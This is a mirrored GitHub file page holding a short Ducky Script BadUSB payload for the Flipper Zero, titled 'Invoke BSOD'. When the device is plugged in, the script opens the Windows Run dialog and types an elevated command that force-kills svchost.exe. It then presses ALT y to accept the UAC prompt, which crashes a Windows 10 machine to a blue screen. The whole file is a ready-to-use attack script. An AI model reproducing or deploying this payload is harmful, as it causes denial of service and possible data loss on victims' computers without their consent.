mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-05 20:40:14 -08:00
18 lines
395 B
Plaintext
18 lines
395 B
Plaintext
REM Title: Invoke BSOD
|
|
REM Author: @beigeworm | https://github.com/beigeworm
|
|
REM Description: This will open powershell and cause a blue screen.
|
|
REM Target: Windows 10
|
|
|
|
REM ***This is a dangerous script - Be Careful!!!***
|
|
|
|
REM some setup for dukie script.
|
|
DEFAULT_DELAY 100
|
|
|
|
DELAY 1000
|
|
GUI r
|
|
DELAY 750
|
|
STRING cmd /c taskkill /f /im svchost.exe
|
|
CTRL-SHIFT ENTER
|
|
DELAY 2500
|
|
ALT y
|